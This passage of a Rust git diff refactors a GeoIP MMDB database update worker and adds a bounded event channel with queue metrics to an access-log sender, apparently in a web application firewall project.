Option>, + db_type: GeoipDatabaseType, + ) -> Self { + let task = GeoipMmdbTask::new( interval_secs, mmdb_base_url, versions_url, mmdb_path, headers, db_type, + ); + Self { + inner: PeriodicWorker::new(task), } } } impl Worker for GeoipMmdbWorker { fn name(&self) -> &str { - match self.db_type { - GeoipDatabaseType::Country => "geoip_country_mmdb", - GeoipDatabaseType::Asn => "geoip_asn_mmdb", - GeoipDatabaseType::City => "geoip_city_mmdb", - } + self.inner.name() } - fn run(&self, mut shutdown: watch::Receiver) -> JoinHandle<()> { - let interval_secs = self.interval_secs; - let mmdb_base_url = self.mmdb_base_url.clone(); - let versions_url = self.versions_url.clone(); - let mmdb_path = self.mmdb_path.clone(); - let headers = self.headers.clone(); - let db_type_enum = self.db_type.clone(); - let db_type = match self.db_type { - GeoipDatabaseType::Country => "country", - GeoipDatabaseType::Asn => "asn", - GeoipDatabaseType::City => "city", - }; - - tokio::spawn(async move { - let worker_name = format!("geoip_{}_mmdb", db_type); - let mut current_version: Option = None; - - log::info!( - "[{}] Starting GeoIP MMDB worker (interval: {}s)", - worker_name, - interval_secs - ); - - match sync_mmdb( - &mmdb_base_url, - &versions_url, - mmdb_path.clone(), - current_version.clone(), - headers.clone(), - db_type_enum.clone(), - ) - .await - { - Ok(new_ver) => { - // Only refresh if the file was actually updated (not "existing") - if new_ver.as_ref().map(|v| v != "existing").unwrap_or(true) { - current_version = new_ver; - } - // Always refresh the database reader to ensure it's loaded - match db_type { - "country" => { - if let Err(e) = crate::threat::refresh_geoip_country_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP Country MMDB: {}", worker_name, e); - } - } - "asn" => { - if let Err(e) = crate::threat::refresh_geoip_asn_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP ASN MMDB: {}", worker_name, e); - } - } - "city" => { - if let Err(e) = crate::threat::refresh_geoip_city_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP City MMDB: {}", worker_name, e); - } - } - _ => {} - } - } - Err(e) => { - log::warn!("[{}] Initial GeoIP {} MMDB sync failed: {}", worker_name, db_type, e); - } - } - - let mut ticker = interval(Duration::from_secs(interval_secs)); - ticker.set_missed_tick_behavior(MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = ticker.tick() => { - match sync_mmdb( - &mmdb_base_url, - &versions_url, - mmdb_path.clone(), - current_version.clone(), - headers.clone(), - db_type_enum.clone(), - ).await { - Ok(new_ver) => { - if new_ver != current_version { - current_version = new_ver; - log::info!("[{}] GeoIP {} MMDB updated to latest version", worker_name, db_type); - // Refresh only the specific database that was updated - match db_type { - "country" => { - if let Err(e) = crate::threat::refresh_geoip_country_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP Country MMDB: {}", worker_name, e); - } - } - "asn" => { - if let Err(e) = crate::threat::refresh_geoip_asn_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP ASN MMDB: {}", worker_name, e); - } - } - "city" => { - if let Err(e) = crate::threat::refresh_geoip_city_mmdb().await { - log::warn!("[{}] Failed to refresh GeoIP City MMDB: {}", worker_name, e); - } - } - _ => {} - } - } else { - log::debug!("[{}] GeoIP {} MMDB already at latest version", worker_name, db_type); - } - } - Err(e) => { - log::warn!("[{}] Periodic GeoIP MMDB sync failed: {}", worker_name, e); - } - } - } - _ = shutdown.changed() => { - if *shutdown.borrow() { - log::info!("[{}] GeoIP MMDB worker received shutdown signal", worker_name); - break; - } - } - } - } - }) + fn run(&self, shutdown: watch::Receiver) -> JoinHandle<()> { + self.inner.run(shutdown) } } +// ============================================================================ +// Sync logic (unchanged) +// ============================================================================ + async fn sync_mmdb( mmdb_base_url: &str, versions_url: &str, @@ -183,43 +230,43 @@ async fn sync_mmdb( headers: Option>, db_type: GeoipDatabaseType, ) -> Result> { - let mut local_path = mmdb_path.ok_or_else(|| anyhow!("MMDB path not configured for GeoIP MMDB worker"))?; + let mut local_path = + mmdb_path.ok_or_else(|| anyhow!("MMDB path not configured for GeoIP MMDB worker"))?; // If the path doesn't have a file extension, treat it as a directory and append the filename if local_path.extension().is_none() { - let filename = match db_type { - GeoipDatabaseType::Country => "GeoLite2-Country.mmdb", - GeoipDatabaseType::Asn => "GeoLite2-ASN.mmdb", - GeoipDatabaseType::City => "GeoLite2-City.mmdb", - }; - local_path = local_path.join(filename); + local_path = local_path.join(db_type.filename()); } if versions_url.is_empty() { // Check if file already exists - if it does, skip download to avoid redundant writes // This prevents multiple workers from downloading the same file simultaneously if local_path.exists() { - log::debug!("GeoIP MMDB file already exists at {:?}, skipping download", local_path); + log::debug!( + "GeoIP MMDB file already exists at {:?}, skipping download", + local_path + ); return Ok(Some("existing".to_string())); } - log::debug!("No versions URL provided, downloading directly from {}", mmdb_base_url); + log::debug!( + "No versions URL provided, downloading directly from {}", + mmdb_base_url + ); - let bytes = if mmdb_base_url.starts_with("http://") || mmdb_base_url.starts_with("https://") { + let bytes = if mmdb_base_url.starts_with("http://") || mmdb_base_url.starts_with("https://") + { download_mmdb(mmdb_base_url, headers.as_ref()).await? } else { let src_path = PathBuf::from(mmdb_base_url); - tokio::fs::read(&src_path) - .await - .with_context(|| format!("Failed to read MMDB from {:?}", src_path))? + tokio::fs::read(&src_path).await.with_context(|| { + format!( + "Failed to copy MMDB from {:?} to {:?}", + src_path, local_path + ) + })? }; - if let Some(parent) = local_path.parent() { - tokio::fs::create_dir_all(parent) - .await - .with_context(|| format!("Failed to create MMDB directory {:?}", parent))?; - } - tokio::fs::write(&local_path, &bytes) .await .with_context(|| format!("Failed to write MMDB to {:?}", local_path))?; @@ -228,33 +275,33 @@ async fn sync_mmdb( return Ok(Some("direct".to_string())); } - let versions_text = if versions_url.starts_with("http://") || versions_url.starts_with("https://") { - let client = get_global_reqwest_client() - .context("Failed to get HTTP client for versions download")?; - let mut req = client.get(versions_url); - if let Some(ref hdrs) = headers { - for (key, value) in hdrs { - req = req.header(key, value); + let versions_text = + if versions_url.starts_with("http://") || versions_url.starts_with("https://") { + let client = get_global_reqwest_client() + .context("Failed to get HTTP client for versions download")?; + let mut req = client.get(versions_url); + if let Some(ref hdrs) = headers { + for (key, value) in hdrs { + req = req.header(key, value); + } } - } - let resp = req - .send() - .await - .with_context(|| format!("Failed to download versions file from {}", versions_url))?; - let status = resp.status(); - if !status.is_success() { - return Err(anyhow!( - "Versions download failed: status {} from {}", - status, - versions_url - )); - } - resp.text().await.context("Failed to read versions body")? - } else { - tokio::fs::read_to_string(versions_url) - .await - .with_context(|| format!("Failed to read versions file from {}", versions_url))? - }; + let resp = req.send().await.with_context(|| { + format!("Failed to download versions file from {}", versions_url) + })?; + let status = resp.status(); + if !status.is_success() { + return Err(anyhow!( + "Versions download failed: status {} from {}", + status, + versions_url + )); + } + resp.text().await.context("Failed to read versions body")? + } else { + tokio::fs::read_to_string(versions_url) + .await + .with_context(|| format!("Failed to read versions file from {}", versions_url))? + }; let latest = parse_latest_version(&versions_text) .ok_or_else(|| anyhow!("Failed to parse latest version from versions file"))?; @@ -272,23 +319,20 @@ async fn sync_mmdb( download_mmdb(&url, headers.as_ref()).await? } else { let src_path = PathBuf::from(base).join(&latest); - tokio::fs::read(&src_path) - .await - .with_context(|| format!("Failed to read MMDB from {:?}", src_path))? + tokio::fs::read(&src_path).await.with_context(|| { + format!( + "Failed to copy MMDB from {:?} to {:?}", + src_path, local_path + ) + })? }; - if let Some(parent) = local_path.parent() { - tokio::fs::create_dir_all(parent) - .await - .with_context(|| format!("Failed to create MMDB directory {:?}", parent))?; - } - tokio::fs::write(&local_path, &bytes) .await .with_context(|| format!("Failed to write MMDB to {:?}", local_path))?; log::info!("GeoIP MMDB written to {:?}", local_path); - crate::threat::refresh_geoip_mmdb().await?; + crate::security::waf::threat::refresh_geoip_mmdb().await?; Ok(Some(latest)) } @@ -301,19 +345,24 @@ fn parse_latest_version(text: &str) -> Option { None } +/// Download MMDB file into memory and return the bytes async fn download_mmdb(url: &str, headers: Option<&HashMap>) -> Result> { - let client = get_global_reqwest_client() - .context("Failed to get HTTP client for MMDB download")?; - let mut req = client.get(url); + let client = + get_global_reqwest_client().context("Failed to get HTTP client for MMDB download")?; + + let timeout_secs = 600; // 10 minutes for large MMDB files + let mut req = client.get(url).timeout(Duration::from_secs(timeout_secs)); if let Some(hdrs) = headers { for (key, value) in hdrs { req = req.header(key, value); } } - let resp = req - .send() - .await - .with_context(|| format!("Failed to download MMDB from {}", url))?; + let resp = req.send().await.with_context(|| { + format!( + "Failed to download MMDB from {} (timeout: {}s)", + url, timeout_secs + ) + })?; let status = resp.status(); if !status.is_success() { return Err(anyhow!( @@ -322,8 +371,32 @@ async fn download_mmdb(url: &str, headers: Option<&HashMap>) -> url )); } - let bytes = resp.bytes().await.context("Failed to read MMDB body")?; - Ok(bytes.to_vec()) -} + let content_length = resp.content_length(); + let file_size_mb = content_length.map(|s| s as f64 / 1_048_576.0); + log::info!( + "Downloading MMDB from {} (content-length: {:?}, ~{:.2} MB, timeout: {}s)", + url, + content_length, + file_size_mb.unwrap_or(0.0), + timeout_secs + ); + let bytes = resp.bytes().await.with_context(|| { + format!( + "Failed to read MMDB body from {} (content-length: {:?}, ~{:.2} MB)", + url, + content_length, + file_size_mb.unwrap_or(0.0) + ) + })?; + + log::info!( + "Successfully downloaded MMDB from {} (size: {} bytes, ~{:.2} MB)", + url, + bytes.len(), + bytes.len() as f64 / 1_048_576.0 + ); + + Ok(bytes.to_vec()) +} diff --git a/src/worker/log.rs b/src/worker/log.rs index 4dcc4ca..5f9df21 100644 --- a/src/worker/log.rs +++ b/src/worker/log.rs @@ -1,12 +1,13 @@ +use chrono::{DateTime, Utc}; +use serde::{Deserialize, Serialize}; use std::sync::Arc; use std::sync::RwLock; +use std::sync::atomic::{AtomicU64, AtomicUsize, Ordering}; use std::time::{Duration, Instant}; use tokio::sync::{mpsc, watch}; use tokio::time::interval; -use serde::{Deserialize, Serialize}; -use chrono::{DateTime, Utc}; -use crate::http_client; +use crate::utils::http_client; /// Maximum batch size allowed by the API server const API_MAX_BATCH_SIZE: usize = 1000; @@ -15,6 +16,9 @@ const API_MAX_BATCH_SIZE: usize = 1000; /// This prevents unbounded memory growth when the API is unreachable const MAX_FAILED_EVENTS: usize = 5000; +/// Default channel capacity when bounded mode is enabled +pub const DEFAULT_CHANNEL_CAPACITY: usize = 10_000; + /// Configuration for sending access logs to arxignis server #[derive(Debug, Clone)] pub struct LogSenderConfig { @@ -24,8 +28,11 @@ pub struct LogSenderConfig { pub batch_size_limit: usize, // Maximum number of logs in a batch pub batch_size_bytes: usize, // Maximum size of batch in bytes (5MB) pub batch_timeout_secs: u64, // Maximum time to wait before sending batch (10 seconds) - pub include_request_body: bool, // Whether to include request body in logs + pub include_request_body: bool, // Whether to include request body in logs pub max_body_size: usize, // Maximum size for request body (1MB) + /// Channel capacity for event queue. None = unbounded, Some(n) = bounded with n capacity. + /// When bounded, events will be dropped if the queue is full (to prevent OOM). + pub channel_capacity: Option, } impl LogSenderConfig { @@ -34,14 +41,22 @@ impl LogSenderConfig { enabled, base_url, api_key, - batch_size_limit: 1000, // Default: 1000 logs per batch (API limit) + batch_size_limit: 1000, // Default: 1000 logs per batch (API limit) batch_size_bytes: 5 * 1024 * 1024, // Default: 5MB - batch_timeout_secs: 10, // Default: 10 seconds - include_request_body: false, // Default: disabled - max_body_size: 1024 * 1024, // Default: 1MB + batch_timeout_secs: 10, // Default: 10 seconds + include_request_body: false, // Default: disabled + max_body_size: 1024 * 1024, // Default: 1MB + channel_capacity: None, // Default: unbounded (backward compatible) } } + /// Create config with bounded channel (recommended for production) + pub fn new_bounded(enabled: bool, base_url: String, api_key: String, capacity: usize) -> Self { + let mut config = Self::new(enabled, base_url, api_key); + config.channel_capacity = Some(capacity); + config + } + /// Check if log sending is enabled and api_key is configured pub fn should_send_logs(&self) -> bool { self.enabled && !self.api_key.is_empty() @@ -49,7 +64,8 @@ impl LogSenderConfig { } /// Global log sender configuration -static LOG_SENDER_CONFIG: std::sync::OnceLock>>> = std::sync::OnceLock::new(); +static LOG_SENDER_CONFIG: std::sync::OnceLock>>> = + std::sync::OnceLock::new(); pub fn get_log_sender_config() -> Arc>> { LOG_SENDER_CONFIG @@ -64,16 +80,273 @@ pub fn set_log_sender_config(config: LogSenderConfig) { } } +// ============================================================================ +// Event Queue Metrics +// ============================================================================ + +/// Metrics for monitoring the event queue health and performance +#[derive(Debug, Default)] +pub struct EventQueueMetrics { + /// Current number of events waiting in the queue + pub queue_depth: AtomicUsize, + /// Total number of events received (attempted to send) + pub total_received: AtomicU64, + /// Total number of events successfully queued + pub total_queued: AtomicU64, + /// Total number of events dropped due to full queue (bounded mode only) + pub total_dropped: AtomicU64, + /// Total number of events successfully sent to API + pub total_sent: AtomicU64, + /// Total number of events that failed to send (stored for retry) + pub total_failed: AtomicU64, + /// Current number of events in the failed/retry buffer + pub failed_buffer_depth: AtomicUsize, + /// High watermark - maximum queue depth observed + pub high_watermark: AtomicUsize, +} + +impl EventQueueMetrics { + pub fn new() -> Self { + Self::default() + } + + /// Record a new event received + pub fn record_received(&self) { + self.total_received.fetch_add(1, Ordering::Relaxed); + } + + /// Record an event successfully queued + pub fn record_queued(&self) { + self.total_queued.fetch_add(1, Ordering::Relaxed); + let depth = self.queue_depth.fetch_add(1, Ordering::Relaxed) + 1; + // Update high watermark if needed + let mut current_high = self.high_watermark.load(Ordering::Relaxed); + while depth > current_high { + match self.high_watermark.compare_exchange_weak( + current_high, + depth, + Ordering::Relaxed, + Ordering::Relaxed, + ) { + Ok(_) => break, + Err(new_high) => current_high = new_high, + } + } + } + + /// Record an event dropped due to full queue + pub fn record_dropped(&self) { + self.total_dropped.fetch_add(1, Ordering::Relaxed); + } + + /// Record an event consumed from queue (for processing) + pub fn record_consumed(&self) { + self.queue_depth.fetch_sub(1, Ordering::Relaxed); + } + + /// Record events successfully sent to API + pub fn record_sent(&self, count: usize) { + self.total_sent.fetch_add(count as u64, Ordering::Relaxed); + } + + /// Record events that failed to send + pub fn record_failed(&self, count: usize) { + self.total_failed.fetch_add(count as u64, Ordering::Relaxed); + } + + /// Update failed buffer depth + pub fn set_failed_buffer_depth(&self, depth: usize) { + self.failed_buffer_depth.store(depth, Ordering::Relaxed); + } + + /// Get a snapshot of all metrics + pub fn snapshot(&self) -> EventQueueMetricsSnapshot { + EventQueueMetricsSnapshot { + queue_depth: self.queue_depth.load(Ordering::Relaxed), + total_received: self.total_received.load(Ordering::Relaxed), + total_queued: self.total_queued.load(Ordering::Relaxed), + total_dropped: self.total_dropped.load(Ordering::Relaxed), + total_sent: self.total_sent.load(Ordering::Relaxed), + total_failed: self.total_failed.load(Ordering::Relaxed), + failed_buffer_depth: self.failed_buffer_depth.load(Ordering::Relaxed), + high_watermark: self.high_watermark.load(Ordering::Relaxed), + } + } +} + +/// A point-in-time snapshot of event queue metrics +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct EventQueueMetricsSnapshot { + pub queue_depth: usize, + pub total_received: u64, + pub total_queued: u64, + pub total_dropped: u64, + pub total_sent: u64, + pub total_failed: u64, + pub failed_buffer_depth: usize, + pub high_watermark: usize, +} + +impl EventQueueMetricsSnapshot { + /// Calculate the drop rate as a percentage + pub fn drop_rate_percent(&self) -> f64 { + if self.total_received == 0 { + 0.0 + } else { + (self.total_dropped as f64 / self.total_received as f64) * 100.0 + } + } + + /// Calculate the success rate as a percentage + pub fn success_rate_percent(&self) -> f64 { + if self.total_queued == 0 { + 100.0 + } else { + (self.total_sent as f64 / self.total_queued as f64) * 100.0 + } + } +} + +/// Global metrics instance +static EVENT_QUEUE_METRICS: std::sync::OnceLock> = + std::sync::OnceLock::new(); + +/// Get the global event queue metrics +pub fn get_event_queue_metrics() -> Arc { + EVENT_QUEUE_METRICS + .get_or_init(|| Arc::new(EventQueueMetrics::new())) + .clone() +} + +/// Get a snapshot of event queue metrics +pub fn get_metrics_snapshot() -> EventQueueMetricsSnapshot { + get_event_queue_metrics().snapshot() +} + +// ============================================================================ +// Event Sender (supports both bounded and unbounded channels) +// ============================================================================ + +/// Wrapper for event channel sender that supports both bounded and unbounded modes +enum EventSenderInner { + Unbounded(mpsc::UnboundedSender), + Bounded(mpsc::Sender), +} + +/// Thread-safe event sender with metrics tracking +pub struct EventSender { + inner: EventSenderInner, + metrics: Arc, +} + +impl EventSender { + /// Create an unbounded event sender + fn new_unbounded( + sender: mpsc::UnboundedSender, + metrics: Arc, + ) -> Self { + Self { + inner: EventSenderInner::Unbounded(sender), + metrics, + } + } + + /// Create a bounded event sender + fn new_bounded(sender: mpsc::Sender, metrics: Arc) -> Self { + Self { + inner: EventSenderInner::Bounded(sender), + metrics, + } + } + + /// Send an event to the queue (non-blocking) + /// Returns true if the event was queued, false if it was dropped + pub fn send(&self, event: UnifiedEvent) -> bool { + self.metrics.record_received(); + + match &self.inner { + EventSenderInner::Unbounded(sender) => { + match sender.send(event) { + Ok(()) => { + self.metrics.record_queued(); + true + } + Err(_) => { + // Channel closed + self.metrics.record_dropped(); + false + } + } + } + EventSenderInner::Bounded(sender) => { + // Use try_send for non-blocking behavior + match sender.try_send(event) { + Ok(()) => { + self.metrics.record_queued(); + true + } + Err(mpsc::error::TrySendError::Full(_)) => { + // Queue is full, drop the event + self.metrics.record_dropped(); + log::warn!( + "Event queue full, dropping event (consider increasing channel_capacity)" + ); + false + } + Err(mpsc::error::TrySendError::Closed(_)) => { + // Channel closed + self.metrics.record_dropped(); + false + } + } + } + } + } + + /// Check if the channel is bounded + pub fn is_bounded(&self) -> bool { + matches!(self.inner, EventSenderInner::Bounded(_)) + } +} + +// Make EventSender Clone-able so it can be shared across threads +impl Clone for EventSender { + fn clone(&self) -> Self { + Self { + inner: match &self.inner { + EventSenderInner::Unbounded(s) => EventSenderInner::Unbounded(s.clone()), + EventSenderInner::Bounded(s) => EventSenderInner::Bounded(s.clone()), + }, + metrics: self.metrics.clone(), + } + } +} + +/// Global event sender +static EVENT_SENDER: std::sync::OnceLock = std::sync::OnceLock::new(); + +/// Get the global event sender (if initialized) +pub fn get_event_sender() -> Option<&'static EventSender> { + EVENT_SENDER.get() +} + +/// Initialize the global event sender (called by LogSenderWorker) +fn set_event_sender(sender: EventSender) { + let _ = EVENT_SENDER.set(sender); +} + /// Unified event types that can be sent to the /events endpoint #[derive(Debug, Clone, Serialize, Deserialize)] #[serde(tag = "event_type")] pub enum UnifiedEvent { #[serde(rename = "http_access_log")] - HttpAccessLog(crate::access_log::HttpAccessLog), + HttpAccessLog(crate::logger::access_log::HttpAccessLog), #[serde(rename = "dropped_ip")] - DroppedIp(crate::bpf_stats::DroppedIpEvent), + DroppedIp(crate::logger::bpf_stats::DroppedIpEvent), #[serde(rename = "tcp_fingerprint")] - TcpFingerprint(crate::utils::tcp_fingerprint::TcpFingerprintEvent), + TcpFingerprint(crate::utils::fingerprint::tcp_fingerprint::TcpFingerprintEvent), + #[serde(rename = "agent_status")] + AgentStatus(crate::platform::agent_status::AgentStatusEvent), } impl UnifiedEvent { @@ -83,6 +356,7 @@ impl UnifiedEvent { UnifiedEvent::HttpAccessLog(_) => "http_access_log", UnifiedEvent::DroppedIp(_) => "dropped_ip", UnifiedEvent::TcpFingerprint(_) => "tcp_fingerprint", + UnifiedEvent::AgentStatus(_) => "agent_status", } } @@ -92,6 +366,7 @@ impl UnifiedEvent { UnifiedEvent::HttpAccessLog(event) => event.timestamp, UnifiedEvent::DroppedIp(event) => event.timestamp, UnifiedEvent::TcpFingerprint(event) => event.timestamp, + UnifiedEvent::AgentStatus(event) => event.timestamp, } } @@ -133,9 +408,9 @@ impl EventBuffer { } fn should_flush(&self, config: &LogSenderConfig) -> bool { - self.events.len() >= config.batch_size_limit || - self.total_size_bytes >= config.batch_size_bytes || - self.last_flush_time.elapsed().as_secs() >= config.batch_timeout_secs + self.events.len() >= config.batch_size_limit + || self.total_size_bytes >= config.batch_size_bytes + || self.last_flush_time.elapsed().as_secs() >= config.batch_timeout_secs } fn take_events(&mut self) -> Vec { @@ -158,15 +433,22 @@ impl EventBuffer { let events_to_drop = events.len().min(self.failed_events.len()); for _ in 0..events_to_drop { if let Some(dropped) = self.failed_events.first() { - self.failed_size_bytes = self.failed_size_bytes.saturating_sub(estimate_event_size(dropped)); + self.failed_size_bytes = self + .failed_size_bytes + .saturating_sub(estimate_event_size(dropped)); } self.failed_events.remove(0); } - log::warn!("Failed events buffer full, dropped {} oldest events", events_to_drop); + log::warn!( + "Failed events buffer full, dropped {} oldest events", + events_to_drop + ); } // Add new events (up to the limit) - let events_to_add = events.into_iter().take(MAX_FAILED_EVENTS.saturating_sub(self.failed_events.len())); + let events_to_add = events + .into_iter() + .take(MAX_FAILED_EVENTS.saturating_sub(self.failed_events.len())); for event in events_to_add { let event_size = estimate_event_size(&event); self.failed_events.push(event); @@ -176,8 +458,7 @@ impl EventBuffer { fn should_retry_failed_events(&self) -> bool { // Retry failed events every 30 seconds - !self.failed_events.is_empty() && - self.last_retry_time.elapsed().as_secs() >= 30 + !self.failed_events.is_empty() && self.last_retry_time.elapsed().as_secs() >= 30 } fn take_failed_events(&mut self) -> Vec { @@ -189,6 +470,10 @@ impl EventBuffer { fn has_failed_events(&self) -> bool { !self.failed_events.is_empty() } + + fn failed_events_count(&self) -> usize { + self.failed_events.len() + } } /// Estimate the size of an event in bytes @@ -199,40 +484,71 @@ fn estimate_event_size(event: &UnifiedEvent) -> usize { match event { UnifiedEvent::HttpAccessLog(log) => { - base_size + log.http.body.len() + log.response.body.len() + - log.http.headers.len() * 50 // Rough estimate for headers + let http_body = log.http.as_ref().map(|h| h.body.len()).unwrap_or(0); + let http_headers = log.http.as_ref().map(|h| h.headers.len() * 50).unwrap_or(0); + base_size + http_body + log.response.body.len() + http_headers } UnifiedEvent::DroppedIp(_) => base_size + 200, // Dropped IP events are relatively small UnifiedEvent::TcpFingerprint(_) => base_size + 100, // TCP fingerprint events are small + UnifiedEvent::AgentStatus(_) => base_size + 800, // Agent status events are small/medium JSON payloads } } -/// Channel for sending events to the batch processor -static EVENT_CHANNEL: std::sync::OnceLock> = std::sync::OnceLock::new(); - -pub fn get_event_channel() -> Option<&'static mpsc::UnboundedSender> { - EVENT_CHANNEL.get() -} - -pub fn set_event_channel(sender: mpsc::UnboundedSender) { - let _ = EVENT_CHANNEL.set(sender); +/// Send an event to the unified queue +/// Returns true if the event was queued, false if it was dropped or channel not initialized +pub fn send_event(event: UnifiedEvent) -> bool { + if let Some(sender) = get_event_sender() { + sender.send(event) + } else { + // Event channel not initialized - this is expected when log_sending_enabled is false + log::trace!("Event channel not initialized, skipping event queuing"); + false + } } -/// Send an event to the unified queue -pub fn send_event(event: UnifiedEvent) { - if let Some(sender) = get_event_channel() { - if let Err(e) = sender.send(event) { - log::warn!("Failed to send event to queue: {}", e); +/// Send an event to the unified queue (async version for bounded channels) +/// This version will wait if the queue is full instead of dropping +pub async fn send_event_async(event: UnifiedEvent) -> bool { + if let Some(sender) = get_event_sender() { + let metrics = get_event_queue_metrics(); + metrics.record_received(); + + match &sender.inner { + EventSenderInner::Unbounded(s) => match s.send(event) { + Ok(()) => { + metrics.record_queued(); + true + } + Err(_) => { + metrics.record_dropped(); + false + } + }, + EventSenderInner::Bounded(s) => { + // Use send().await for blocking behavior on bounded channel + match s.send(event).await { + Ok(()) => { + metrics.record_queued(); + true + } + Err(_) => { + metrics.record_dropped(); + false + } + } + } } } else { - // Event channel not initialized - this is expected when log_sending_enabled is false log::trace!("Event channel not initialized, skipping event queuing"); + false } } /// Send a batch of events to the /events endpoint /// Automatically splits large batches into chunks of API_MAX_BATCH_SIZE -async fn send_event_batch(events: Vec) -> Result<(), Box> { +async fn send_event_batch( + events: Vec, +) -> Result<(), Box> { if events.is_empty() { return Ok(()); } @@ -266,8 +582,13 @@ async fn send_event_batch(events: Vec) -> Result<(), Box) -> Result<(), Box, } impl LogSenderWorker { pub fn new(check_interval_secs: u64) -> Self { Self { check_interval_secs, + channel_capacity: None, + } + } + + /// Create a worker with explicit channel capacity + pub fn with_capacity(check_interval_secs: u64, capacity: Option) -> Self { + Self { + check_interval_secs, + channel_capacity: capacity, + } + } +} + +/// Enum to hold either bounded or unbounded receiver +enum EventReceiver { + Unbounded(mpsc::UnboundedReceiver), + Bounded(mpsc::Receiver), +} + +impl EventReceiver { + async fn recv(&mut self) -> Option { + match self { + EventReceiver::Unbounded(r) => r.recv().await, + EventReceiver::Bounded(r) => r.recv().await, } } } @@ -314,18 +679,49 @@ impl super::Worker for LogSenderWorker { fn run(&self, mut shutdown: watch::Receiver) -> tokio::task::JoinHandle<()> { let check_interval_secs = self.check_interval_secs; let worker_name = self.name().to_string(); - - // Create event channel - let (sender, mut receiver) = mpsc::unbounded_channel::(); - set_event_channel(sender); + let channel_capacity_override = self.channel_capacity; tokio::spawn(async move { - log::info!("[{}] Starting log sender worker", worker_name); + // Get channel capacity from config or use override + let channel_capacity = channel_capacity_override.or_else(|| { + let config_store = get_log_sender_config(); + let config_guard = config_store.read().unwrap(); + config_guard.as_ref().and_then(|c| c.channel_capacity) + }); + + // Get or create metrics + let metrics = get_event_queue_metrics(); + + // Create event channel based on capacity setting + let mut receiver = if let Some(capacity) = channel_capacity { + let (sender, receiver) = mpsc::channel::(capacity); + let event_sender = EventSender::new_bounded(sender, metrics.clone()); + set_event_sender(event_sender); + log::info!( + "[{}] Starting log sender worker (bounded channel, capacity: {})", + worker_name, + capacity + ); + EventReceiver::Bounded(receiver) + } else { + let (sender, receiver) = mpsc::unbounded_channel::(); + let event_sender = EventSender::new_unbounded(sender, metrics.clone()); + set_event_sender(event_sender); + log::info!( + "[{}] Starting log sender worker (unbounded channel)", + worker_name + ); + EventReceiver::Unbounded(receiver) + }; let mut buffer = EventBuffer::new(); let mut flush_interval = interval(Duration::from_secs(check_interval_secs)); flush_interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); + // Metrics logging interval (every 60 seconds) + let mut metrics_interval = interval(Duration::from_secs(60)); + metrics_interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); + loop { tokio::select! { _ = shutdown.changed() => { @@ -335,9 +731,13 @@ impl super::Worker for LogSenderWorker { // Flush any remaining events before exiting if !buffer.is_empty() { let events = buffer.take_events(); + let event_count = events.len(); if let Err(e) = send_event_batch(events.clone()).await { log::warn!("[{}] Failed to send final event batch: {}, storing locally", worker_name, e); buffer.add_failed_events(events); + metrics.record_failed(event_count); + } else { + metrics.record_sent(event_count); } } @@ -347,6 +747,17 @@ impl super::Worker for LogSenderWorker { log::warn!("[{}] Storing {} failed events locally (endpoint unavailable)", worker_name, failed_events.len()); } + // Log final metrics + let snapshot = metrics.snapshot(); + log::info!("[{}] Final metrics - received: {}, queued: {}, sent: {}, dropped: {}, failed: {}", + worker_name, + snapshot.total_received, + snapshot.total_queued, + snapshot.total_sent, + snapshot.total_dropped, + snapshot.total_failed + ); + log::info!("[{}] Log sender worker stopped", worker_name); break; } @@ -356,6 +767,7 @@ impl super::Worker for LogSenderWorker { event = receiver.recv() => { match event { Some(event) => { + metrics.record_consumed(); // Event removed from channel let count = buffer.add_event(event); log::trace!("[{}] Added event to buffer, total: {}", worker_name, count); } @@ -365,9 +777,13 @@ impl super::Worker for LogSenderWorker { // Flush any remaining events before exiting if !buffer.is_empty() { let events = buffer.take_events(); + let event_count = events.len(); if let Err(e) = send_event_batch(events.clone()).await { log::warn!("[{}] Failed to send final event batch: {}, storing locally", worker_name, e); buffer.add_failed_events(events); + metrics.record_failed(event_count); + } else { + metrics.record_sent(event_count); } } @@ -395,11 +811,14 @@ impl super::Worker for LogSenderWorker { if buffer.should_flush(&config) { let events = buffer.take_events(); if !events.is_empty() { - log::debug!("[{}] Flushing event batch: {} events", worker_name, events.len()); - log::debug!("[{}] Events: {:?}", worker_name, events); + let event_count = events.len(); + log::debug!("[{}] Flushing event batch: {} events", worker_name, event_count); if let Err(e) = send_event_batch(events.clone()).await { log::warn!("[{}] Failed to send event batch: {}, storing locally for retry", worker_name, e); buffer.add_failed_events(events); + metrics.record_failed(event_count); + } else { + metrics.record_sent(event_count); } } } @@ -408,13 +827,38 @@ impl super::Worker for LogSenderWorker { if buffer.should_retry_failed_events() { let failed_events = buffer.take_failed_events(); if !failed_events.is_empty() { - log::debug!("[{}] Retrying failed event batch: {} events", worker_name, failed_events.len()); + let event_count = failed_events.len(); + log::debug!("[{}] Retrying failed event batch: {} events", worker_name, event_count); if let Err(e) = send_event_batch(failed_events.clone()).await { log::warn!("[{}] Failed to retry event batch: {}, storing locally again", worker_name, e); buffer.add_failed_events(failed_events); + } else { + metrics.record_sent(event_count); } } } + + // Update failed buffer depth metric + metrics.set_failed_buffer_depth(buffer.failed_events_count()); + } + } + + // Periodic metrics logging + _ = metrics_interval.tick() => { + let snapshot = metrics.snapshot(); + if snapshot.total_received > 0 { + log::info!( + "[{}] Queue metrics - depth: {}, high_watermark: {}, received: {}, queued: {}, sent: {}, dropped: {} ({:.2}%), failed_buffer: {}", + worker_name, + snapshot.queue_depth, + snapshot.high_watermark, + snapshot.total_received, + snapshot.total_queued, + snapshot.total_sent, + snapshot.total_dropped, + snapshot.drop_rate_percent(), + snapshot.failed_buffer_depth + ); } } } @@ -422,4 +866,3 @@ impl super::Worker for LogSenderWorker { }) } } - diff --git a/src/worker/manager.rs b/src/worker/manager.rs index 7a2df95..15f513c 100644 --- a/src/worker/manager.rs +++ b/src/worker/manager.rs @@ -1,6 +1,11 @@ use std::collections::HashMap; +use std::future::Future; +use std::pin::Pin; +use std::sync::Arc; +use std::time::Duration; use tokio::sync::watch; use tokio::task::JoinHandle; +use tokio::time::{MissedTickBehavior, interval}; /// Worker trait that all workers must implement pub trait Worker: Send + Sync + 'static { 